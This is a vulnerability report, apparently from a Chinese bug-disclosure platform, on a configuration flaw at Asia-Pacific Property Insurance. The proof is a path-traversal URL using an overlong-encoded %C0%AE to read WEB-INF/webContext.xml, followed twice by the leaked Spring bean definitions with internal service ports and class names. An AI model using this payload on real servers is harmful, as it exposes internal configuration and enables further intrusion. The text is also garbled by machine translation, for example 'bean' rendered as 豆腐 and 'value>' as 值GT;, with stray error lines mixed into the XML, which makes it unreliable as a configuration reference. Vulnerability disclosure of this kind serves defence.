漏洞标题 亚太财产保险配置信息错误导致数据库配置文件泄露 相关制造商 亚太财产保险 漏洞作者 乳头 提交时间 2016-04-24 21: 30 公共时间 2016-06-11 11: 30 漏洞类型 应用配置错误 危险等级 高 自我评估等级 20 漏洞状态 已提交给第三方合作机构(cncert National Internet Emergency Center) 标签标签 错误消息未被阻止 漏洞详细信息 http://**。**。**。** /%C0%AE/WEB-INF/webContext.xml
- > < bean id='BUSINESS_FACADE'class='org.springframework.remoting.httpinvoker.HttpInvokerProxyFactoryBean'> < property name='serviceUrl'value='http://localhost: 8002/businessFacade.service'/> < property name='serviceInterface'value='org.javatech.ebf.app.facade.BusinessFacade'/> < /豆腐> < bean id='coreInterFaceFacade'class='org.springframework.remoting.httpinvoker.HttpInvokerProxyFactoryBean'> < property name='serviceUrl'> <值GT;http://localhost: 9001/coreInterFace.action</value> < /性> < property name='serviceInterface'> <值GT; org.javatech.ebf.app.facade.BusinessFacade< /值GT; < /性> < /豆腐> < bean id='realCoreInterFaceFacade'class='org.springframework.remoting.httpinvoker.HttpInvokerProxyFactoryBean'> < property name='serviceUrl'> <值GT; **。**。**。**: 7002/transactionProcess.service < /值GT; < /性> < property name='serviceInterface'> <值GT; com.chinainsurance.application.extbusiness.service.facade.TransactionProcess < /值GT; < /性> 从对等方接收数据时失败 < property name='serviceUrl'> <值GT; **。**。**。**: 6009/transactionProcess.service < /值GT; < /性> < property name='serviceInterface'> <值GT; com.chinainsurance.application.extbusiness.service.facade.TransactionProcess 漏洞证明: http://**。**。**。** /%C0%AE/WEB-INF/webContext.xml
- > < bean id='BUSINESS_FACADE'class='org.springframework.remoting.httpinvoker.HttpInvokerProxyFactoryBean'> < property name='serviceUrl'value='http://localhost: 8002/businessFacade.service'/> < property name='serviceInterface'value='org.javatech.ebf.app.facade.BusinessFacade'/> < /豆腐> < bean id='coreInterFaceFacade'class='org.springframework.remoting.httpinvoker.HttpInvokerProxyFactoryBean'> < property name='serviceUrl'> <值GT;http://localhost: 9001/coreInterFace.action</value> < /性> < property name='serviceInterface'> <值GT; org.javatech.ebf.app.facade.BusinessFacade< /值GT; < /性> < /豆腐> < bean id='realCoreInterFaceFacade'class='org.springframework.remoting.httpinvoker.HttpInvokerProxyFactoryBean'> < property name='serviceUrl'> <值GT; **。**。**。**: 7002/transactionProcess.service < /值GT; < /性> < property name='serviceInterface'> <值GT; com.chinainsurance.application.extbusiness.service.facade.TransactionProcess < /值GT; < /性> < /豆腐> < bean id='coreInterFaceFacade_claim'class='org.springframework.remoting.httpinvoker.HttpInvokerProxyFactoryBean'> <! - 测试环境配置为**。**。**。**: 8011/transactionProcess.service - > < property name='serviceUrl'> < value> **。**。**。**: 6005/transactionProcess.service</value> < /性> < property name='serviceInterface'> <值GT; com.chinainsurance.application.extbusiness.service.facade.TransactionProcess < /值GT; < /性> < /豆腐> <! - 第三方支付核心财务界面 - > 从对等方接收数据时失败